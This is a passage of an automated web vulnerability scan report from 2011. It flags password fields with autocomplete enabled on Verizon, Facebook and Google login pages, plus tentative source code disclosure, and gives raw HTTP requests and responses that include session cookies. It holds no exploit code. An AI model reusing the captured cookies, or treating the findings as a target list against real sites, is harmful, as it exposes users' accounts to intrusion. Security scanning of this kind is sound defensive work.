Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

11.1. http://b2b.vzw.com/industrysolutions/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://b2b.vzw.com
Path:	/industrysolutions/index.html

Issue detail

The page contains a form with the following action URL:

https://mblogin.verizonwireless.com/amserver/UI/Login?realm=vzwmb

The form contains the following password field with autocomplete enabled:

IDToken2

Request

GET /industrysolutions/index.html HTTP/1.1
Host: b2b.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Type: text/html
X-Cacheable: NO: !obj.cacheable
Content-Length: 20859
Date: Mon, 05 Sep 2011 21:56:40 GMT
X-Varnish: 1491768482
Age: 0
Via: 1.1 varnish
Connection: keep-alive

...[SNIP]...
<div class="login_content">
<form name="myaccountForm" id="myaccountForm" method="post" action="https://mblogin.verizonwireless.com/amserver/UI/Login?realm=vzwmb">
<input type="hidden" name="rememberUserNameCheckBoxExists" value="Y" />
...[SNIP]...
</label>
<input type="password" name="IDToken2" id="IDToken2" maxlength="60" />
<div class="fixer_10">
...[SNIP]...

11.2. https://dashboard.opinionlab.com/pv_controlboard.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://dashboard.opinionlab.com
Path:	/pv_controlboard.html

Issue detail

The page contains a form with the following action URL:

https://dashboard.opinionlab.com/login/dashboard.html

The form contains the following password field with autocomplete enabled:

password

Request

GET /pv_controlboard.html HTTP/1.1
Host: dashboard.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.3. https://enterprisecenter.verizon.com/enterprisesolutions/default/CC/signIn.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/default/CC/signIn.do

Issue detail

The page contains a form with the following action URL:

https://enterprisecenter.verizon.com/enterprisesolutions/Default/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET /enterprisesolutions/default/CC/signIn.do HTTP/1.1
Host: enterprisecenter.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Expires: Mon, 05 Sep 2011 22:35:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:35:21 GMT
Content-Length: 21910
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]...
<div id = "siginInPod" class="boxContent fixedBoxHeightAnon">
                   <form onsubmit="return validform()" name="SignInForm" id="SignInForm" action="https://EnterpriseCenter.verizon.com/enterprisesolutions/Default/login.fcc" method="POST" onload="begin()" target="_top">

                                   <strong>
...[SNIP]...
<br />
                                   <input type="password" name="PASSWORD" id="PASSWORD" size="22" style="width:150px" onkeypress="javascript:EnterKeySubmit(event);"/>
                                   <br>
...[SNIP]...

11.4. https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/default/signIn.do

Issue detail

The page contains a form with the following action URL:

https://enterprisecenter.verizon.com/enterprisesolutions/Default/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET /enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

11.5. https://signin.verizon.com/sso/RetrieveUserID previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/RetrieveUserID

Issue detail

The page contains a form with the following action URL:

https://signin.verizon.com/sso/RetrieveUserID?action=processFlow

The form contains the following password fields with autocomplete enabled:

vzPwd
vzPwd1

Request

POST /sso/RetrieveUserID?goFlow=forgotUserID HTTP/1.1
Host: signin.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ForgotUserIDPassword
Content-Length: 160
Cache-Control: max-age=0
Origin: https://signin.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; VZSSOCOM_SESSIONID=3G0bTlLf1jTwG4vn19Q6hKvqw4QjypJ4qhDWfmfDPR62TbVp8RjL!419329926!559599265; CP=null*; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

VZHeader1%3AHdnPageName=forgot%2Buser%2Bid%2Bor%2Bpassword&VZHeader1%3AHdnPageUrl=%2Fvz%2Fresidential%2Fmyverizon2%2Fregistration%2Flogin%2Bhelp&choice=forgotID

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:23:21 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 72575



<html>

<head>

<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">

<meta
...[SNIP]...
</table>
<form name="forgotUserID" action="/sso/RetrieveUserID?action=processFlow" method="post" onsubmit="return validate();">
<input name="VZHeader1:HdnPageName" id="VZHeader1_HdnPageName" type="hidden" value="step+1+account+information"/>
...[SNIP]...
<td style="padding-left: 15px;"><INPUT type="password" name="vzPwd" size="20" maxlength="24"></td>
...[SNIP]...
<td style="padding-left: 30px;"><INPUT type="password" name="vzPwd1" size="20" maxlength="24"></td>
...[SNIP]...

11.6. http://webmail.verizon.com/signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://webmail.verizon.com
Path:	/signin/

Issue detail

The page contains a form with the following action URL:

https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW&clientId=webmail&goto=http://webmail.verizon.com/signin/LdapBind.jsp

The form contains the following password field with autocomplete enabled:

IDToken2

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:18:35 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:18:35 GMT
Content-Length: 17185

<html>
<head>
   <title>Verizon | My Verizon 2.0 | Webmail</title>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta HT
...[SNIP]...
<div style="vertical-align: top; padding: 0px; margin: 0px;width: 372px; height: 535px; background-image: url('images/signin_bkgd3.jpg')">
               <form name="frmLogin" id="frmLogin" method="post" action="https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW&clientId=webmail&goto=http://webmail.verizon.com/signin/LdapBind.jsp">
               <input name="VZHeader1:HdnPageName" id="VZHeader1_HdnPageName" type="hidden" value="container"/>
...[SNIP]...
<td valign="top">

                                       <input name="IDToken2" type="password" class="text" id="IDToken2" accesskey="p" tabindex="2" size="25" />

                                   </td>
...[SNIP]...

11.7. http://webmail.verizon.net/signin/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/signin/

Issue detail

The page contains a form with the following action URL:

https://auth.verizon.net/amserver/UI/Login?realm=dotnet&module=LDAP&clientId=webmail&goto=http://webmail.verizon.net/signin/LdapBind.jsp

The form contains the following password field with autocomplete enabled:

IDToken2

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:19:04 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:19:03 GMT
Content-Length: 19268

<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...
<div style="vertical-align: top; padding: 0px; margin: 0px;width: 372px; height: 499px; background-image: url('images/signin_bkgd.jpg')">
           <form name="frmLogin" id="frmLogin" method="post" action="https://auth.verizon.net/amserver/UI/Login?realm=dotnet&module=LDAP&clientId=webmail&goto=http://webmail.verizon.net/signin/LdapBind.jsp">
               <table width="322" border="0" cellpadding="0">
...[SNIP]...
<td valign="top">

                                       <input name="IDToken2" type="password" class="text" id="IDToken2" accesskey="p" tabindex="2" size="25" />

                                   </td>
...[SNIP]...

11.8. http://webmail.verizon.net/signin/Login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/signin/Login.jsp

Issue detail

The page contains a form with the following action URL:

https://auth.verizon.net/amserver/UI/Login?realm=dotnet&module=LDAP&clientId=webmail&goto=http://webmail.verizon.net/signin/LdapBind.jsp

The form contains the following password field with autocomplete enabled:

IDToken2

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=1"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:39:25 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:39:25 GMT
Content-Length: 19468

<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...
<div style="vertical-align: top; padding: 0px; margin: 0px;width: 372px; height: 499px; background-image: url('images/signin_bkgd.jpg')">
           <form name="frmLogin" id="frmLogin" method="post" action="https://auth.verizon.net/amserver/UI/Login?realm=dotnet&module=LDAP&clientId=webmail&goto=http://webmail.verizon.net/signin/LdapBind.jsp">
               <table width="322" border="0" cellpadding="0">
...[SNIP]...
<td valign="top">

                                       <input name="IDToken2" type="password" class="text" id="IDToken2" accesskey="p" tabindex="2" size="25" />

                                   </td>
...[SNIP]...

11.9. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://webmail.verizonemail.net
Path:	/webmail/servlet/HttpNimletDriver

Issue detail

The page contains a form with the following action URL:

http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

The form contains the following password field with autocomplete enabled:

Request

Response

11.10. http://www.connecttoverizon.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

The form contains the following password field with autocomplete enabled:

upwd

Request

GET / HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.11. http://www.connecttoverizon.com/loginFailed.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/loginFailed.html

Issue detail

The page contains a form with the following action URL:

http://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

The form contains the following password field with autocomplete enabled:

upwd

Request

Response

11.12. http://www.connecttoverizon.com/loginFailed.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/loginFailed.html

Issue detail

The page contains a form with the following action URL:

https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

The form contains the following password field with autocomplete enabled:

upwd

Request

Response

11.13. http://www.connecttoverizon.com/order-now.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/order-now.html

Issue detail

The page contains a form with the following action URL:

https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

The form contains the following password field with autocomplete enabled:

upwd

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.14. http://www.facebook.com/connect/prompt_feed.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/prompt_feed.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1&display=popup

The form contains the following password field with autocomplete enabled:

pass

Request

GET /connect/prompt_feed.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.22.50
Connection: close
Date: Mon, 05 Sep 2011 22:36:09 GMT
Content-Length: 12409

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/connect\/prompt_feed.php";window._EagleEyeSeed="a2xk";</s
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1&display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

11.15. http://www.facebook.com/dialog/feed previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/dialog/feed

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: locale=en_US; expires=Mon, 12-Sep-2011 22:36:10 GMT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.149.54
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 14722

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/dialog\/feed";window._EagleEyeSeed="EcbK";</script><meta
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.16. https://www.google.com/accounts/ServiceLogin previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:

https://www.google.com/accounts/ServiceLoginAuth

The form contains the following password field with autocomplete enabled:

Passwd

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:nej40pZ-DDJ9AuDvMixEXuI_isIpQw:dizilfo2QNAghruN;Path=/accounts;Expires=Wed, 04-Sep-2013 22:36:17 GMT;Secure;HttpOnly
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Frame-Options: Deny
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 05 Sep 2011 22:36:17 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 11099
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>
<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"

class="gaia le val"

/>
</td>
...[SNIP]...

11.17. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The page contains a form with the following action URL:

https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND%7eLECLS+3YR+1V

The form contains the following password field with autocomplete enabled:

Password

Request

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54820
Expires: Mon, 05 Sep 2011 22:25:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:39 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: SrcClientID=smallbusiness.verizon.com; path=/; secure; HttpOnly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>

...[SNIP]...
<body onload="setTimeZone();javascript:ShowNone();" class="order">
<form name="frmNatBndlQualify" method="post" action="NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND%7eLECLS+3YR+1V" id="frmNatBndlQualify">
<div>
...[SNIP]...
<br />
<input class="inputform" id="Password" type="password" name="Password" />
<br />
...[SNIP]...

11.18. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The page contains a form with the following action URL:

https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

The form contains the following password field with autocomplete enabled:

Password

Request

GET /FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54765
Expires: Mon, 05 Sep 2011 22:38:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:00 GMT
Connection: close
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>

...[SNIP]...
<body onload="setTimeZone();javascript:ShowNone();" class="order">
<form name="frmNatBndlQualify" method="post" action="NBUNDLEQUALIFY.ASPX" id="frmNatBndlQualify">
<div>
...[SNIP]...
<br />
<input class="inputform" id="Password" type="password" name="Password" />
<br />
...[SNIP]...

12. Source code disclosure previous next
There are 15 instances of this issue:

http://business.verizon.net/SMBPortalWeb/resources/js/common.js
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf
http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf
http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf
http://static-business.verizon.net/SMBPortalWeb/resources/js/common.js
http://www22.verizon.com/Content/verizonglobalhome/Includes/Javascript/common.js
http://www22.verizon.com/Residentialhelp/includes/javascript/TopLevelTab.js
http://www22.verizon.com/content/contactus/includes/javascript/TopLevelTab.js
https://www22.verizon.com/Content/verizonglobalhome/Includes/Javascript/common.js
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

12.1. http://business.verizon.net/SMBPortalWeb/resources/js/common.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/resources/js/common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /SMBPortalWeb/resources/js/common.js HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
